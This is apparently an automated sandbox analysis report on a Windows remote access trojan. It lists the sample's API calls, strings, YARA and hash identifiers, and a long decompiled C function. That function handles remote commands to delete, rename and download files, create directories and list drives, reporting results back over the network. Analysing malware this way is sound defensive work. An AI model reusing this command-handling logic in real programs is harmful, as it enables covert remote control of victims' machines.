0x00411d0d
0x00411d12
0x00411d17
0x00411d23
0x00411d23
0x00411d28
0x00411d2d
0x00411d2f
0x00411d31
0x00411d35
0x00411d35
0x00411d40
0x00411d45
0x00411d68
0x00411d7c
0x00411d93
0x00411db0
0x00411dc4
0x00411de7
0x00411df9
0x00411e09
0x00411e19
0x00411e39
0x00411e4c
0x00411e5e
0x00412088
0x0041208c
0x00412097
0x0041209b
0x004120a6
0x004120b1
0x004120bc
0x004120c7
0x004120d2
0x004120dd
0x004120e8
0x004120f3
0x004120fe
0x00412109
0x00412114
0x0041211f
0x0041212a
0x00412135
0x00412140
0x0041214b
0x00412156
0x00412161
0x0041216c
0x00412177
0x00412182
0x0041218d
0x00412198
0x004121a3
0x004121ae
0x004121b9
0x004121c4
0x004121cf
0x004121da
0x004121e5
0x004121f0
0x004121fb
0x00412206
0x00412211
0x0041221c
0x00412227
0x00412232
0x0041223d
0x00412248
0x00412253
0x0041225e
0x00412269
0x00412274
0x0041227f
0x0041228a
0x00412295
0x004122a0
0x004122ab
0x004122b6
0x004122c1
0x004122cc
0x004122d4
0x004122e2
0x004122e7
0x004122ee
0x004122f9
0x004122fb
0x004122fb
0x00412309
0x00412310
0x00412310
0x00412315
0x0041231a
0x00412324
0x00412329
0x00412333
0x00412338
0x0041233d
0x00412347
0x00412355
0x00412355
0x0041235e
0x00412366
0x00412366
0x0041236b
0x0041236e
0x0041236e
0x00412373
0x00412377
0x0041237a
0x0041237b
0x00412380
0x00412382
0x00412386
0x0041238a
0x0041239e
0x0041239e
0x004123a6
0x004123a6
0x004123af
0x00000000

APIs

Sleep.KERNEL32(00000000,00000029,751443E0,0046C578,00000000), ref: 0041197A

Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A

gethostbyname.WS2_32(00000000), ref: 00411B6B
htons.WS2_32(00000000), ref: 00411BA9
Sleep.KERNELBASE(00000000,00000002), ref: 004123A6

Part of subcall function 00410A30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 00410A4C
Part of subcall function 00410A30: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00410A65
Part of subcall function 00410A30: RegCloseKey.ADVAPI32(00000000), ref: 00410A70

GetTickCount.KERNEL32 ref: 00411DA2

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

CreateThread.KERNEL32 ref: 00412355

Strings

Connecting to , xrefs: 00411AF1
C:\Windows\SysWOW64\logagent.exe, xrefs: 00411D38
Octopus-GM39UT, xrefs: 00411D8B
3.2.1 Pro, xrefs: 00411E20
Connected to , xrefs: 00411BFB
name, xrefs: 00411D01
(TLS), xrefs: 00411ABC
Exe, xrefs: 00411D5A
%I64u, xrefs: 00411C95
Disconnected!, xrefs: 0041231F
[Info], xrefs: 00411B23, 00411C33, 0041232E

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Sleep$CloseCountCreateLocalOpenQueryThreadTickTimeValuegethostbynamehtonssend
String ID: (TLS)$%I64u$3.2.1 Pro$C:\Windows\SysWOW64\logagent.exe$Connected to $Connecting to $Disconnected!$Exe$Octopus-GM39UT$[Info]$name
API String ID: 2130001850-3446537527
Opcode ID: c487f95d1be02be6a142f853801d1198bedf726f8d6748e6079fc182089de9af
Instruction ID: c8c226d7e30845bf2bb3d2e67be1d86719b60e177ee7695842f0b4eb2dcf0a18
Opcode Fuzzy Hash: c487f95d1be02be6a142f853801d1198bedf726f8d6748e6079fc182089de9af
Instruction Fuzzy Hash: ED427A31A102155BCB18F762DD56AEEB375AF50308F5001BFB40AB61E2EF785F858E89

Uniqueness

Uniqueness Score: -1.00%

Function 0041805B, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 134COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 004181B2

Strings

UserProfile, xrefs: 00418186
WinDir, xrefs: 004180C2, 004180E4, 00418136
\system32, xrefs: 004180D5
AppData, xrefs: 0041817F
SystemDrive, xrefs: 004180B8
ProgramFiles, xrefs: 00418178
Temp, xrefs: 0041808D
\SysWOW64, xrefs: 00418127

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: LongNamePath
String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-1609423294
Opcode ID: be433cda313306e0d1e55ba56c8bd3f8965dad503107297eafce7f391df70cbd
Instruction ID: e17f698a51b082165e1e9e1ea6160020ed1fd31ab47ab9f863ee2cf3c228b6bb
Opcode Fuzzy Hash: be433cda313306e0d1e55ba56c8bd3f8965dad503107297eafce7f391df70cbd
Instruction Fuzzy Hash: EE4189721182409AC204FB21DC52DEF77A9BFA4748F50053FF846620F2EE785E4AC65B

Uniqueness

Uniqueness Score: -1.00%

Function 00404A08, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60networkCOMMON

Download Yara Rule

APIs

connect.WS2_32(?,0046DBA0,00000010), ref: 00404A23

Strings

[ERROR], xrefs: 00404A81
TLS Authentication failed, xrefs: 00404A72

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: connect
String ID: TLS Authentication failed$[ERROR]
API String ID: 1959786783-1964023390
Opcode ID: 1aaa89cb3ab8e83ad8cf31946695e11ac04cd4fa2543e2936ab384321515aea8
Instruction ID: 6a9958cf6c54f084319c11af7f7712e0ea3c55cf2f2f254842a4d7e8f6879e1c
Opcode Fuzzy Hash: 1aaa89cb3ab8e83ad8cf31946695e11ac04cd4fa2543e2936ab384321515aea8
Instruction Fuzzy Hash: 9C014C7138020197DF08BF6589C65673B599F81344B04402BEE059F2C7EA7ADC44CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 00410AA7, Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00410AB6
RegSetValueExA.KERNELBASE(?,00460614,00000000,?,00000000,00000000,0046C518,?,?,0040D161,00460614,3.2.1 Pro), ref: 00410ADE
RegCloseKey.ADVAPI32(?,?,?,0040D161,00460614,3.2.1 Pro), ref: 00410AE9

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 2edf4e72d7368318f1ab4fa0488b4ca7c051504535841057f64486ea7e563853
Instruction ID: e89491bdbf644e4e0ba0d344bde8c25a895909b1be654527de0f828c9f06b44b
Opcode Fuzzy Hash: 2edf4e72d7368318f1ab4fa0488b4ca7c051504535841057f64486ea7e563853
Instruction Fuzzy Hash: 7FF0C232040208BFCB00AFA0DC05DEE3B6CEF04B91F104226BD05A61A1EB759F10DA94

Uniqueness

Uniqueness Score: -1.00%

Function 0044765D, Relevance: 4.5, APIs: 3, Instructions: 37COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00447661
_free.LIBCMT ref: 0044769A
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004476A1

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: EnvironmentStrings$Free_free
String ID:
API String ID: 2716640707-0
Opcode ID: ca87d83b2957fa9352f777ae552d11f2944e91570d6f08a6d552ed0c63014bb8
Instruction ID: 4b3672921d85d94027c856c8d4557e31c130c3ea1869d6c91df0e3c849bae827
Opcode Fuzzy Hash: ca87d83b2957fa9352f777ae552d11f2944e91570d6f08a6d552ed0c63014bb8
Instruction Fuzzy Hash: 8AE0E537149A112AE222223A6C49E7B3619CFC67BA716002BF10886142DF288D0305AD

Uniqueness

Uniqueness Score: -1.00%

Function 004108E2, Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00410904
RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00410923
RegCloseKey.ADVAPI32(?), ref: 0041092C

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 3efdacfa80388e9d7d057647b62979cc548e55fb5466ebc51e456bb7a03a6566
Instruction ID: 3e5bbf023fc67ff476987f8fad8e364188ed9517bf6302b110b94af4ea8623b3
Opcode Fuzzy Hash: 3efdacfa80388e9d7d057647b62979cc548e55fb5466ebc51e456bb7a03a6566
Instruction Fuzzy Hash: 66F0AFB5600308BBDB109F90DD05FED777C9B04B02F1000A6BB04B6191D6B4AB459BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00410885, Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004108A5
RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,0046C518), ref: 004108C3
RegCloseKey.KERNELBASE(?), ref: 004108CE

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 3e4358ca8370b7af3e6ef31cc7bcc25504ab58a31ab422cbec18238428394246
Instruction ID: 52561c361bf01b8e86e1a5ce9e630969f3828b93d2dbd7bb4aa450e57b23c49a
Opcode Fuzzy Hash: 3e4358ca8370b7af3e6ef31cc7bcc25504ab58a31ab422cbec18238428394246
Instruction Fuzzy Hash: A3F01D7690030CBFDF10AFA09C05FEEBBBCEB04B52F1041A5FA04E6195D2759B549B94

Uniqueness

Uniqueness Score: -1.00%

Function 00401646, Relevance: 3.0, APIs: 2, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c3a8728c390c113c6b132477eb103de07588fde746d332fb22f5e7a6bda1aeb
Instruction ID: 14bc11751579f6a418080d33961eb9a75802e287542bdf943e450bbe308a60cc
Opcode Fuzzy Hash: 2c3a8728c390c113c6b132477eb103de07588fde746d332fb22f5e7a6bda1aeb
Instruction Fuzzy Hash: BCF0B4712142085BCB0C9E34AC91BBA375D5B11368BA44B7FF02EDA1E1D73BD984824C

Uniqueness

Uniqueness Score: -1.00%

Function 0043CFE1, Relevance: 3.0, APIs: 2, Instructions: 35COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043D02F

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 18f2041ca1429938108e02d2a53756847af81262eafccf0d74fd8bb75016ea07
Instruction ID: fba902ad4ccf31a8b90f9fdf44a17567959da2f799f45fbd848029ef9f978f3d
Opcode Fuzzy Hash: 18f2041ca1429938108e02d2a53756847af81262eafccf0d74fd8bb75016ea07
Instruction Fuzzy Hash: 56E0A02290541160E239363B7C0565B0265CBC973DF10432BF624C62C2EFAC884341AE

Uniqueness

Uniqueness Score: -1.00%

Function 004186D5, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004186DA

Part of subcall function 00402728: std::_Deallocate.LIBCONCRT ref: 00402B22

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeallocateH_prologstd::_
String ID:
API String ID: 3881773970-0
Opcode ID: 1279e0660ded21508a7f724004055ae431ff02857b90cc6057ac6c92086fe970
Instruction ID: 81f1575e26007701d47cce485488fb1d9f0d7f2c3705a4b1df04078d35adb080
Opcode Fuzzy Hash: 1279e0660ded21508a7f724004055ae431ff02857b90cc6057ac6c92086fe970
Instruction Fuzzy Hash: B6117F71A001149FCB15EF69C9867AEBBB6EF85314F10416FF500AB2E1DBB50901DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00422179, Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00422251: recv.WS2_32(?,?,?,?), ref: 0042225C

WSAGetLastError.WS2_32 ref: 0042219B

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastrecv
String ID:
API String ID: 2514157807-0
Opcode ID: 775403e6fa1c86be6d548b2784bdb667b06ff57a934a787a42b00bd7c27719c5
Instruction ID: 5fd3ebf0e0d9901e6086a92a38d31c1d4f4930f82062b2ddb0320275891adbe9
Opcode Fuzzy Hash: 775403e6fa1c86be6d548b2784bdb667b06ff57a934a787a42b00bd7c27719c5
Instruction Fuzzy Hash: B7F0A43230C1297A9F189959FE94C7933459F85374BB0436BFE3AC65F0EA6998602149

Uniqueness

Uniqueness Score: -1.00%

Function 004221EA, Relevance: 1.5, APIs: 1, Instructions: 38networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0042226A: send.WS2_32(?,?,?,?), ref: 00422275

WSAGetLastError.WS2_32 ref: 0042220C

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastsend
String ID:
API String ID: 1802528911-0
Opcode ID: 8cb09f3eb5d4e7103086a5d97c8df369fda03b4f8b26fdb2e33335adb8823741
Instruction ID: 207b8048d6da47c8d3e1bf0cf2b23625c58979fe3f9e08f58dd8cb8bfe01de6d
Opcode Fuzzy Hash: 8cb09f3eb5d4e7103086a5d97c8df369fda03b4f8b26fdb2e33335adb8823741
Instruction Fuzzy Hash: 19F0BB3530C534FADF18995CFE548393341AF45330B70439BF939866F0DA6E5850917A

Uniqueness

Uniqueness Score: -1.00%

Function 0043F98C, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 20626a587c955ce6a9034e6f34a1cf2dbef27dc7ff66e29b306da7decd8106d9
Instruction ID: 400f104e77b540acbfcd3781324d28ce3e91d9a3d9d75f8370708e8767061156
Opcode Fuzzy Hash: 20626a587c955ce6a9034e6f34a1cf2dbef27dc7ff66e29b306da7decd8106d9
Instruction Fuzzy Hash: 01E02BB290022177DB2126625C0075B36489F5D7B1F103037FD05922C0DB6CCC0582EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040498B, Relevance: 1.5, APIs: 1, Instructions: 30networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000000,00000001,00000006), ref: 004049AC

Part of subcall function 004049DE: WSAStartup.WS2_32(00000202,00000000), ref: 004049F3

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Startupsocket
String ID:
API String ID: 3996037109-0
Opcode ID: 57e39759065e94ff74e98b7e35a5d3c8348f39f3f93ca1ad8d88c95b428a27d8
Instruction ID: 643c1d6dd67993fbe743bd4810411797e70fdf622d87f5941d6678f6439cf7cf
Opcode Fuzzy Hash: 57e39759065e94ff74e98b7e35a5d3c8348f39f3f93ca1ad8d88c95b428a27d8
Instruction Fuzzy Hash: 68F0BEF10057905AE7314F344880393BFD45B52318F14897FE6D2A3BC2C2B9A819C76A

Uniqueness

Uniqueness Score: -1.00%

Function 004049DE, Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,00000000), ref: 004049F3

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 89c49b222f636443e58f1b3fbdfa0b01495877bced7cab345007ae3e0c4764c4
Instruction ID: 820ae791bcbb1d2b57b63688d1298c64991293a60e6d01c8c57279511ad2648c
Opcode Fuzzy Hash: 89c49b222f636443e58f1b3fbdfa0b01495877bced7cab345007ae3e0c4764c4
Instruction Fuzzy Hash: 59D0123255861C4ED611AAB4AD0F8A5B76CC313A12F4003BAACB5C25D3F650572CC2FB

Uniqueness

Uniqueness Score: -1.00%

Function 0042226A, Relevance: 1.5, APIs: 1, Instructions: 10networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,?), ref: 00422275

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: b02335b8f7ea2efaad70bddb1f33b0a78e66c9a69ef7c03d8dd5e29a9a49d19b
Instruction ID: fff77dfbf1f0459fa3aaeb9656e953647c3761fb795b74ea4a0806b79efbc88b
Opcode Fuzzy Hash: b02335b8f7ea2efaad70bddb1f33b0a78e66c9a69ef7c03d8dd5e29a9a49d19b
Instruction Fuzzy Hash: 70C04C79104608BB9B061FA19D08C793B69D7456617008025B90556151D576DA5096B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040697D, Relevance: 35.7, APIs: 7, Strings: 13, Instructions: 697
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040697D(short* __edx, void* __eflags, intOrPtr _a4) {
				char _v108;
				void* _v112;
				char _v132;
				char _v136;
				char _v140;
				char _v152;
				char _v156;
				char _v160;
				void* _v176;
				char _v180;
				char _v192;
				void* _v204;
				char _v208;
				char _v212;
				char _v216;
				void* _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				void* _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				char _v280;
				char _v284;
				char _v288;
				char _v292;
				char _v296;
				void* _v300;
				void* _v308;
				void* _v312;
				char _v324;
				char _v336;
				char _v344;
				char _v348;
				char _v368;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t160;
				signed int _t162;
				void* _t166;
				void* _t171;
				signed int _t172;
				void* _t187;
				void* _t202;
				signed int _t204;
				void* _t218;
				int _t228;
				void* _t235;
				void* _t236;
				void* _t249;
				void* _t256;
				signed int _t261;
				void* _t265;
				void* _t277;
				short* _t288;
				void* _t289;
				void* _t300;
				void* _t316;
				void* _t326;
				void* _t332;
				void* _t334;
				void* _t336;
				void* _t340;
				void* _t344;
				void* _t354;
				void* _t356;
				void* _t377;
				void* _t380;
				void* _t542;
				void* _t569;
				intOrPtr _t574;
				intOrPtr _t575;
				signed int _t576;
				signed int _t578;
				signed int _t581;
				void* _t588;
				void* _t590;
				void* _t592;
				void* _t594;
				void* _t596;
				signed int _t597;
				void* _t600;
				void* _t601;
				void* _t602;
				void* _t603;
				void* _t604;
				void* _t605;
				void* _t606;
				void* _t609;
				void* _t614;
				void* _t615;
				void* _t616;
				void* _t618;
				void* _t620;
				void* _t639;
				void* _t640;
				void* _t641;
				void* _t642;
				void* _t645;
				void* _t647;

				_t646 = __eflags;
				_t550 = __edx;
				_push(_t356);
				_t574 = _a4;
				_push(_t569);
				E004020EC(_t356,  &_v156, __edx, __eflags, _t574 + 0x1c);
				SetEvent( *(_t574 + 0x34));
				_t575 =  *((intOrPtr*)(L00401F95( &_v160)));
				E004042A6( &_v160,  &_v136, 4, 0xffffffff);
				_t600 = (_t597 & 0xfffffff8) - 0xec;
				E004020EC(0x46c238, _t600, _t550, _t646, 0x46c238);
				_t601 = _t600 - 0x18;
				E004020EC(0x46c238, _t601, _t550, _t646,  &_v152);
				E00417478( &_v288, _t550);
				_t602 = _t601 + 0x30;
				_t647 = _t575 - 0x8b;
				if(_t647 > 0) {
					_t576 = _t575 - 0x8c;
					__eflags = _t576;
					if(__eflags == 0) {
						E0040427F(0x46c238,  &_v256, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
						_t160 = GetFileAttributesW(L00401EEB( &_v260));
						__eflags = _t160 & 0x00000010;
						if((_t160 & 0x00000010) == 0) {
							_t162 = DeleteFileW(L00401EEB( &_v260));
						} else {
							_t162 = E00417754(L00401EEB( &_v260));
						}
						__eflags = _t162;
						__eflags = _t162 & 0xffffff00 | _t162 != 0x00000000;
						if(__eflags == 0) {
							_t603 = _t602 - 0x18;
							E0041739C(0x46c238, _t603,  &_v252);
							_push(0x55);
							L00404AA4(0x46c238, 0x46c2e8,  &_v252, __eflags);
							_t166 = E0041733B( &_v208,  &_v280);
							_t604 = _t603 - 0x18;
							_t553 = "Unable to delete: ";
							E004075C2(0x46c238, _t604, "Unable to delete: ", _t569, __eflags, _t166);
							_t605 = _t604 - 0x14;
							_t377 = _t605;
							_push("[ERROR]");
						} else {
							_t187 = E0041733B( &_v180,  &_v252);
							_t609 = _t602 - 0x18;
							_t553 = "Deleted file: ";
							E004075C2(0x46c238, _t609, "Deleted file: ", _t569, __eflags, _t187);
							_t605 = _t609 - 0x14;
							_t377 = _t605;
							_push("[Info]");
						}
						E00402084(0x46c238, _t377);
						L00416C80(0x46c238, _t569);
						_t606 = _t605 + 0x30;
						L00401FC7();
						_t171 = L00401E49( &_v288, _t553, __eflags, 1);
						_t550 = "1";
						_t380 = _t171;
						_t172 = E00405A6F("1");
						__eflags = _t172;
						if(_t172 == 0) {
							L40:
							L00401EF0();
							L41:
							L00401E74( &_v284, _t550);
							L00401FC7();
							L00401FC7();
							return 0;
						} else {
							__eflags = E00407323( &_v272, _t380, _t380) + 1;
							E0040733F(E00407323( &_v272, _t380, _t380) + 1);
							_t550 =  &_v284;
							L00401EFA( &_v284,  &_v284, _t576, L00402FFA(0x46c238,  &_v212,  &_v284, 0x2a));
							L00401EF0();
							E0040427F(0x46c238, _t606 - 0x18, L00401EEB( &_v288));
							L39:
							E004061C3();
							goto L40;
						}
					}
					_t578 = _t576 - 1;
					__eflags = _t578;
					if(__eflags == 0) {
						E0040427F(0x46c238,  &_v256, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
						E0040427F(0x46c238,  &_v216, L00401F95(L00401E49( &_v272, _t550, __eflags, 1)));
						E00407309( &_v276,  &_v252, 0, E00407323( &_v268,  &_v216,  &_v216) + 1);
						_t202 = L00401EEB(E00407629( &_v216,  &_v264,  &_v240));
						_t204 = E00439924(L00401EEB( &_v288), _t202);
						asm("sbb bl, bl");
						L00401EF0();
						_t361 =  ~_t204 + 1;
						__eflags =  ~_t204 + 1;
						if(__eflags == 0) {
							_t550 = E004075E6( &_v180, "Unable to rename file!", __eflags, 0x46c238);
							E00405343(_t361, _t602 - 0x18, _t206, _t569, __eflags, "16");
							_push(0x59);
							L00404AA4(_t361, 0x46c2e8, _t206, __eflags);
							L00401FC7();
						} else {
							_t550 =  &_v228;
							E00407514(_t602 - 0x18,  &_v228, __eflags, "*");
							E004061C3();
						}
						L00401EF0();
						L13:
						L00401EF0();
						goto L40;
					}
					_t581 = _t578 - 1;
					__eflags = _t581;
					if(__eflags == 0) {
						E0040427F(0x46c238,  &_v256, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
						_t218 = L00401F95(L00401E49( &_v272, _t550, __eflags, 1));
						_t550 =  &_v264;
						CreateDirectoryW(L00401EEB(E00407514( &_v192,  &_v264, __eflags, _t218)), 0);
						L00401EF0();
						E00403300(0x2a);
						E00407350(0x46c238, _t602 - 0x18,  &_v264, __eflags,  &_v268);
						goto L39;
					}
					_t583 = _t581 - 3;
					__eflags = _t581 - 3;
					if(__eflags == 0) {
						_t228 = StrToIntA(L00401F95(L00401E49( &_v264, _t550, __eflags, _t583)));
						_t550 = L00401F95(L00401E49( &_v268, _t550, __eflags, 1));
						L00417F10(_t228, _t230);
					}
					goto L41;
				}
				if(_t647 == 0) {
					E004020D5(0x46c238,  &_v180);
					E0040484E(0x46c238,  &_v108, 1);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E00404A08(_t550);
					_t235 = L00401E49( &_v284, _t550, __eflags, 3);
					_t614 = _t602 - 0xfffffffffffffff8;
					_t236 = L00401E49( &_v288, _t550, __eflags, 2);
					L00402F93(0x46c238, _t614, L00402F93(0x46c238,  &_v236, L00402F93(0x46c238,  &_v260, L00402FB7( &_v284, L00401E49( &_v292, _t550, __eflags, 1), 0x46c238), __eflags, _t236), __eflags, 0x46c238), __eflags, _t235);
					L00404AA4(0x46c238,  &_v140, _t240, __eflags);
					L00401FC7();
					L00401FC7();
					L00401FC7();
					E0040427F(0x46c238,  &_v292, L00401F95(L00401E49( &_v324, _t240, __eflags, 0)));
					_t249 = E0041733B( &_v272,  &_v296);
					_t615 = _t614 - 0x18;
					E004075C2(0x46c238, _t615, "Downloading file: ", _t602 - 0x10, __eflags, _t249);
					_t616 = _t615 - 0x14;
					E00402084(0x46c238, _t616, "[Info]");
					L00416C80(0x46c238, "[Info]");
					L00401FC7();
					L00401EF0();
					_t256 = L00401F95(L00401E49( &_v336, "Downloading file: ", __eflags, 0));
					_t618 = _t616 + 0x30 - 0x18;
					E0040427F(0x46c238, _t618, _t256);
					_t261 = E004062D8( &_v192, __eflags, E004398A0(_t258, L00401F95(L00401E49( &_v344, "Downloading file: ", __eflags, 4)), 0, 0xa), "Downloading file: ", 0x56);
					_t620 = _t618 + 0x2c;
					_push(0);
					__eflags = _t261;
					if(__eflags == 0) {
						E0040427F(0x46c238,  &_v264, L00401F95(L00401E49( &_v348, "Downloading file: ", __eflags)));
						_t265 = E0041733B( &_v244,  &_v268);
						_t550 = "Failed to download file: ";
						E004075C2(0x46c238, _t620 - 0x18, "Failed to download file: ", "[Info]", __eflags, _t265);
						E00402084(0x46c238, _t620 - 4, "[ERROR]");
						L00416C80(0x46c238, "[Info]");
						L00401FC7();
						L00401EF0();
					} else {
						E0040427F(0x46c238,  &_v264, L00401F95(L00401E49( &_v348, "Downloading file: ", __eflags)));
						_t277 = E0041733B( &_v244,  &_v268);
						_t550 = "Downloaded file: ";
						E004075C2(0x46c238, _t620 - 0x18, "Downloaded file: ", "[Info]", __eflags, _t277);
						E00402084(0x46c238, _t620 - 4, "[Info]");
						L00416C80(0x46c238, "[Info]");
						L00401FC7();
						L00401EF0();
						E00402084(0x46c238, _t620 - 4 + 0x30 - 0x18, 0x45f6bc);
						_push(0x58);
						L00404AA4(0x46c238,  &_v156, "Downloaded file: ", __eflags);
					}
					L00404E0B( &_v140);
					L00404E2F(0x46c238,  &_v140, 0);
					L15:
					L00401FC7();
					goto L41;
				}
				_t588 = _t575 - 0x61;
				if(_t588 == 0) {
					E0040427F(0x46c238, _t602 - 0x18, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
					_t288 = L00401E49( &_v272, _t550, __eflags, 2);
					_t289 = L00401E49( &_v276, _t550, __eflags, 1);
					_t550 = _t288;
					E004169CC(_t289, _t288);
					goto L41;
				}
				_t590 = _t588 - 0x26;
				if(_t590 == 0) {
					GetLogicalDriveStringsA(0x64,  &_v108);
					E004020AB(0x46c238,  &_v252, _t550, __eflags,  &_v108, 0x64);
					__eflags = E00407397( &_v260, 0x45f860, 0, 2) + 1;
					L00401F84(E00407397( &_v260, 0x45f860, 0, 2) + 1);
					E004020EC(0x46c238, _t602 - 0x18, _t550, E00407397( &_v260, 0x45f860, 0, 2) + 1,  &_v276);
					_t300 = E00406406(0x46c238,  &_v256);
					_t550 = L00402FB7( &_v232,  &_v280, 0x46c238);
					L00402F1D(_t602 - 0x18, _t301, _t300);
					_push(0x51);
					L00404AA4(0x46c238, 0x46c2e8, _t301, __eflags);
